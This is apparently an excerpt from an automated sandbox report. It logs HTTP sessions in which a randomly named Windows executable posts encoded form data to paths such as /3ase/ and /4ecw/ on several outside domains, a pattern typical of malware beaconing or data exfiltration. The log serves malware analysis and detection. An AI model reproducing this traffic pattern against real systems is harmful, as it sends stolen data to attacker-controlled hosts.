                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 53 33 64 47 6b 45 74 73 4f 79 56 2b 34 2b 69 4c 75 59 53 4e 63 74 54 4e 79 4e 7a 35 61 6f 61 34 34 31 56 51 32 68 61 52 4d 54 47 6e 5a 52 6c 47 43 6d 43 6d 46 72 53 34 70 4a 59 34 33 39 6b 42 50 66 4c 4c 2b 78 33 59 47 2b 7a 71 5a 4e 69 49 41 62 55 30 4f 77 68 66 37 68 70 33 4b 6c 4a 45 73 35 78 67 4d 43 4c 51 4c 4b 67 77 74 2f 73 36 4d 55 68 70 64 2f 50 41 77 54 66 70 64 77 78 2f 77 69 57 43 71 63 7a 4f 76 43 6d 4c 45 65 36 6c 46 2f 6c 75 35 53 75 42 4c 53 64 39 6b 49 37 50 2f 6e 57 57 39 53 6f 66 31 62 62 56 52 78 71 35 5a 78 67 73 74 47 6d 47 6a 4a 67 2f 4e 31 79 35 37 2b 46 6e 36 75 6d 72 6e 49 34 68 7a 4d 4c 5a 79 6d 43 6c 55 76 55 3d
                                                        Data Ascii: Q8r=S3dGkEtsOyV+4+iLuYSNctTNyNz5aoa441VQ2haRMTGnZRlGCmCmFrS4pJY439kBPfLL+x3YG+zqZNiIAbU0Owhf7hp3KlJEs5xgMCLQLKgwt/s6MUhpd/PAwTfpdwx/wiWCqczOvCmLEe6lF/lu5SuBLSd9kI7P/nWW9Sof1bbVRxq5ZxgstGmGjJg/N1y57+Fn6umrnI4hzMLZymClUvU=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.45002584.32.84.32805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:20.704643965 CET10846OUTPOST /3ase/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.electronify.shop
                                                        Origin: http://www.electronify.shop
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.electronify.shop/3ase/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 53 33 64 47 6b 45 74 73 4f 79 56 2b 34 2b 69 4c 75 59 53 4e 63 74 54 4e 79 4e 7a 35 61 6f 61 34 34 31 56 51 32 68 61 52 4d 54 4f 6e 5a 44 39 47 51 31 36 6d 55 62 53 34 6a 70 59 35 33 39 6b 6d 50 66 44 48 2b 78 37 69 47 34 33 71 59 6f 32 49 55 35 77 30 58 41 68 66 6b 52 70 32 55 56 4a 52 73 35 67 72 4d 44 37 51 4c 4b 67 77 74 38 45 36 4b 47 5a 70 4f 76 50 48 34 7a 66 4d 5a 77 78 54 77 69 65 38 71 63 2f 65 76 79 47 4c 45 2b 71 6c 4a 73 42 75 34 79 75 44 47 79 64 62 6b 49 33 51 2f 6d 36 67 39 54 4e 36 31 59 48 56 41 30 50 6c 4e 79 55 53 35 41 4b 4f 39 75 4e 64 4b 56 57 2b 37 2b 68 41 33 39 6e 77 2f 49 4d 54 30 4d 75 4b 69 55 71 30 4c 76 78 72 42 31 59 61 38 5a 4d 44 30 71 32 79 44 7a 65 4f 70 4d 4b 6a 45 52 66 4b 51 51 77 4c 51 51 4b 6f 39 7a 64 6f 4a 64 37 34 31 39 32 32 57 35 65 31 4f 6c 66 43 53 2f 7a 54 6b 4a 37 6e 66 56 69 45 57 65 66 4e 33 54 77 64 69 53 62 52 36 38 36 67 65 48 6a 35 37 6a 50 4b 71 50 78 30 75 56 42 49 6f 69 4a 62 69 54 37 4d 59 62 4c 4f 6c 43 52 71 45 76 41 4c 53 2b [TRUNCATED]
                                                        Data Ascii: Q8r=S3dGkEtsOyV+4+iLuYSNctTNyNz5aoa441VQ2haRMTOnZD9GQ16mUbS4jpY539kmPfDH+x7iG43qYo2IU5w0XAhfkRp2UVJRs5grMD7QLKgwt8E6KGZpOvPH4zfMZwxTwie8qc/evyGLE+qlJsBu4yuDGydbkI3Q/m6g9TN61YHVA0PlNyUS5AKO9uNdKVW+7+hA39nw/IMT0MuKiUq0LvxrB1Ya8ZMD0q2yDzeOpMKjERfKQQwLQQKo9zdoJd741922W5e1OlfCS/zTkJ7nfViEWefN3TwdiSbR686geHj57jPKqPx0uVBIoiJbiT7MYbLOlCRqEvALS+Vxn4UizDRw+QLRogml8gUOwdNcXypW43RGtM0fBNXi3/6o28Mweo9xGPohtuGRJg+A9nZ+6TC/9QjNeuyn1J9KZIwFp7P+39WIVFaaMHLcAn2VArUVXsLBxm3IH0FA7ImdgKk48mDMZmtFnZXmW9Jc7oxaVxemKt1RfpBX1avmFt8v8QX5W5JNrulXdVvnx9CzymEOGCi7ii302uhXKjnqRB3uNjso1w8lDyuvF1TD0NiPP/1tPXF+jOvImyyVrEPDAEgf+qqyrZYZbUqP8sL4QsUM8OPaF4CpV43k85jllXwLyFJ5eQn5/e3z0GJOSYd2w30/sOB5Q45N3Pv1Q1Fm8eheK16hfbUKBKbqt1somrNk7YjdIWDNpWt+p4MFutr+UwTjhYsOnVHcgQBhiAa7TUyWepuLCIvSg3CeBZv8QyjpwnSSwezetBH05JkIdj1w8IerFLeZQ44qLBOcjIvTE24TkO0U/wyhLMGUztUP1u8Q12Ykj+hXdiNR7eoFde1j/m1wc6vNvWNE2Z2Hsay0llaADGZHrBcDUsBRSvGjhlUkBMEYQNmK6XopccNvG3EF6PTfbYWC4vZvB0Di3a6y+HXqcakcwbyKkjneoaz+mvLttLlvDm/bk2Kq65FKHBIvlN1099hBgpHwxBK7X5pjc9KQaQOMOQFh [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.45002684.32.84.32805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:23.251815081 CET468OUTGET /3ase/?Q8r=f11mnzhDDGBf+/artp+PfsS316rmJteNkA5Z8hOTIieoFxtTQBGeVYPutJ4Jq/YWKuaYmzuYepHFf+3fXfMgZDBF3jtHXko48sZRIiancbFNwMQpED1LC8k=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.electronify.shop
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:12:24.065368891 CET1236INHTTP/1.1 200 OK
                                                        Server: hcdn
                                                        Date: Mon, 04 Nov 2024 09:12:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 10072
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        alt-svc: h3=":443"; ma=86400
                                                        x-hcdn-request-id: a96f43aae4b8346c0026fb43c96bdc91-int-edge1
                                                        Expires: Mon, 04 Nov 2024 09:12:22 GMT
                                                        Cache-Control: no-cache
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                        Nov 4, 2024 10:12:24.065390110 CET1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                        Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                        Nov 4, 2024 10:12:24.065401077 CET424INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                        Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                        Nov 4, 2024 10:12:24.065412045 CET1236INData Raw: 70 78 20 30 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 62 61 73 65 6c 69 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67
                                                        Data Ascii: px 0;align-items:baseline;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.secti
                                                        Nov 4, 2024 10:12:24.065432072 CET1236INData Raw: 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 30 70 78 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69
                                                        Data Ascii: container{margin-top:30px}.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-
                                                        Nov 4, 2024 10:12:24.065442085 CET424INData Raw: 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 61 66 66 69 6c 69 61 74 65 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64
                                                        Data Ascii: /a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"><
                                                        Nov 4, 2024 10:12:24.065459967 CET1236INData Raw: 63 6c 61 73 73 3d 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 3e 48 61 70 70 79 20 74 6f 20 73 65 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69
                                                        Data Ascii: class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger
                                                        Nov 4, 2024 10:12:24.065623999 CET1236INData Raw: 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76
                                                        Data Ascii: stom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/
                                                        Nov 4, 2024 10:12:24.065634966 CET424INData Raw: 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 61 3d 31 32 38 2c 66 3d 30 2c 69 3d 37 32 2c 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b
                                                        Data Ascii: e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o
                                                        Nov 4, 2024 10:12:24.065655947 CET1236INData Raw: 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 31 29 22 29 3b 69 66 28 66 2b 3d 73 2a 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36
                                                        Data Ascii: floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("p
                                                        Nov 4, 2024 10:12:24.070408106 CET488INData Raw: 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e
                                                        Data Ascii: }++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.450027162.0.231.203805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:29.227746964 CET729OUTPOST /4ecw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.sibeta.info
                                                        Origin: http://www.sibeta.info
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sibeta.info/4ecw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 35 66 34 63 42 61 4a 4a 4a 75 55 34 37 76 6e 72 4f 31 52 34 71 36 39 42 38 76 42 4b 35 6b 6b 62 6e 4d 69 4f 43 45 4b 77 32 56 4f 41 45 44 4c 67 33 4c 47 74 46 4c 53 73 6f 69 46 63 36 78 74 55 4e 2f 41 74 77 6d 44 59 74 71 55 4a 76 46 61 58 6f 78 4b 34 58 45 4c 6e 55 44 54 6a 44 32 5a 53 4b 31 74 53 37 55 6d 55 39 44 34 74 50 31 73 76 53 34 76 66 41 46 56 77 5a 4c 5a 70 2f 43 66 4d 4e 64 4d 7a 59 7a 34 4f 30 57 2b 30 74 6c 39 61 34 59 31 2b 62 54 48 65 39 54 59 2b 48 6e 74 74 2f 4c 58 6f 64 54 2b 37 55 63 33 78 45 6c 30 62 47 42 32 42 35 31 41 39 62 32 50 33 6e 77 55 6e 54 77 3d 3d
                                                        Data Ascii: Q8r=5f4cBaJJJuU47vnrO1R4q69B8vBK5kkbnMiOCEKw2VOAEDLg3LGtFLSsoiFc6xtUN/AtwmDYtqUJvFaXoxK4XELnUDTjD2ZSK1tS7UmU9D4tP1svS4vfAFVwZLZp/CfMNdMzYz4O0W+0tl9a4Y1+bTHe9TY+Hntt/LXodT+7Uc3xEl0bGB2B51A9b2P3nwUnTw==
                                                        Nov 4, 2024 10:12:29.937017918 CET533INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:12:29 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.450028162.0.231.203805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:31.770297050 CET749OUTPOST /4ecw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.sibeta.info
                                                        Origin: http://www.sibeta.info
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sibeta.info/4ecw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 35 66 34 63 42 61 4a 4a 4a 75 55 34 36 4f 33 72 42 79 6c 34 69 36 38 7a 7a 50 42 4b 7a 45 6b 66 6e 4d 75 4f 43 46 4f 67 32 6e 71 41 45 6d 76 67 6c 66 61 74 49 72 53 73 78 53 46 54 31 52 74 66 4e 2f 63 62 77 69 4c 59 74 71 41 4a 76 46 71 58 30 53 69 37 52 55 4c 6c 66 6a 54 74 48 32 5a 53 4b 31 74 53 37 55 44 63 39 44 77 74 4f 47 45 76 55 74 54 63 65 56 56 7a 51 72 5a 70 6f 79 66 49 4e 64 4e 57 59 79 6b 6f 30 56 47 30 74 6b 4e 61 68 74 42 68 41 6a 47 56 67 6a 5a 65 47 58 73 53 2f 4f 32 59 58 79 6d 67 57 59 6e 50 42 6a 35 42 58 77 58 57 72 31 6b 4f 47 78 47 44 71 7a 70 75 49 78 52 58 49 77 75 41 67 56 79 53 32 6a 50 44 39 58 56 77 56 55 6f 3d
                                                        Data Ascii: Q8r=5f4cBaJJJuU46O3rByl4i68zzPBKzEkfnMuOCFOg2nqAEmvglfatIrSsxSFT1RtfN/cbwiLYtqAJvFqX0Si7RULlfjTtH2ZSK1tS7UDc9DwtOGEvUtTceVVzQrZpoyfINdNWYyko0VG0tkNahtBhAjGVgjZeGXsS/O2YXymgWYnPBj5BXwXWr1kOGxGDqzpuIxRXIwuAgVyS2jPD9XVwVUo=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.450029162.0.231.203805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:34.316119909 CET10831OUTPOST /4ecw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.sibeta.info
                                                        Origin: http://www.sibeta.info
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sibeta.info/4ecw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 35 66 34 63 42 61 4a 4a 4a 75 55 34 36 4f 33 72 42 79 6c 34 69 36 38 7a 7a 50 42 4b 7a 45 6b 66 6e 4d 75 4f 43 46 4f 67 32 6e 69 41 45 77 7a 67 33 6f 75 74 4a 72 53 73 75 69 46 51 31 52 74 34 4e 2f 55 48 77 69 47 74 74 70 34 4a 76 6b 4b 58 34 7a 69 37 59 55 4c 6c 43 7a 54 67 44 32 5a 48 4b 31 63 62 37 55 7a 63 39 44 77 74 4f 41 34 76 46 34 76 63 5a 6c 56 77 5a 4c 5a 66 2f 43 66 73 4e 64 45 72 59 78 49 65 30 45 6d 30 74 45 64 61 6a 37 74 68 64 54 47 58 77 7a 5a 38 47 58 67 7a 2f 4b 66 68 58 79 43 65 57 66 58 50 42 48 45 6a 49 78 4c 51 78 6c 34 4f 53 69 37 69 6c 44 39 75 52 44 74 75 49 51 4f 69 39 56 6d 47 78 44 57 56 75 6e 70 44 41 42 4c 44 4e 72 70 59 51 43 4e 4f 4d 35 4b 36 57 69 33 57 77 71 79 6f 57 50 55 45 49 5a 4f 6e 4b 6f 2f 77 31 4a 36 4d 69 6c 4c 57 6a 31 79 50 39 67 72 62 74 34 64 63 79 62 64 43 4c 32 6e 38 4c 58 48 70 6f 4c 31 64 7a 6e 48 54 56 31 52 54 37 41 34 5a 43 35 64 52 63 51 73 36 4a 6a 73 72 67 58 36 6b 39 31 36 39 6a 58 49 43 63 4f 62 31 44 4e 55 52 66 35 5a 4c 42 77 [TRUNCATED]
                                                        Data Ascii: Q8r=5f4cBaJJJuU46O3rByl4i68zzPBKzEkfnMuOCFOg2niAEwzg3outJrSsuiFQ1Rt4N/UHwiGttp4JvkKX4zi7YULlCzTgD2ZHK1cb7Uzc9DwtOA4vF4vcZlVwZLZf/CfsNdErYxIe0Em0tEdaj7thdTGXwzZ8GXgz/KfhXyCeWfXPBHEjIxLQxl4OSi7ilD9uRDtuIQOi9VmGxDWVunpDABLDNrpYQCNOM5K6Wi3WwqyoWPUEIZOnKo/w1J6MilLWj1yP9grbt4dcybdCL2n8LXHpoL1dznHTV1RT7A4ZC5dRcQs6JjsrgX6k9169jXICcOb1DNURf5ZLBw8P65T9oL7tyJD7yFML0/vRfsFpzozaFlc56i8b5zH9EK3mvW+nkOxp35k6UfOEpBIF88nOfZPiN3JTXGNvoznRUZMIIrfCtflL9pEzW6+xTA69Xor5DrzI7ZSQeDEGoAfKUhErYud1pYnYmGUKYGO1T/KyB2Iyo+mtNjlXQ94EmQv2xZjhOqlE2D5j6w+GjtTVPaXmv8Wuq/Jh8+4jx4KDepLcl5aSGRqOwhXjErSfuM6mXp4T2OWBNAdoX1kPPpB/Pek36cASfOG8in2PD3bSHaeG/wOhhgUCaIPvgX1L0DURXf6N+515KWDGgundAgSBDx9k1pDx+Q/FkaXi6Riz+c/Q5hK7W2KfIyF8qjqTEEnPGXe8rdSpsRZ89Rr43z4vLkKMI40IQ7mPVOp914WES8PS0VXjunlBC10rgrpXJqSw9uRALfj1PPQp9jZ9TUUsioMDRtkk/2BHpsFP7R5Ix3qlBxRSnLWxoU3jVlqwH6WGT93EqSoHT/oXh9Ux/xXzDQv0YsSF4a4meZFF7fpMQVMOz/zm+PAFRBjUX8HgED9cQOAVh6GhVFAQ+wxOKu5SDwV5voNME7GDja1iLBX+M9JJpe/ONfxV7oCTzoHTL50+tEEs0lsX5PoJkCSvCBja8X0UpyDAt6LjWrdImUuOY41iwKKWAQgO [TRUNCATED]
                                                        Nov 4, 2024 10:12:34.993571997 CET533INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:12:34 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
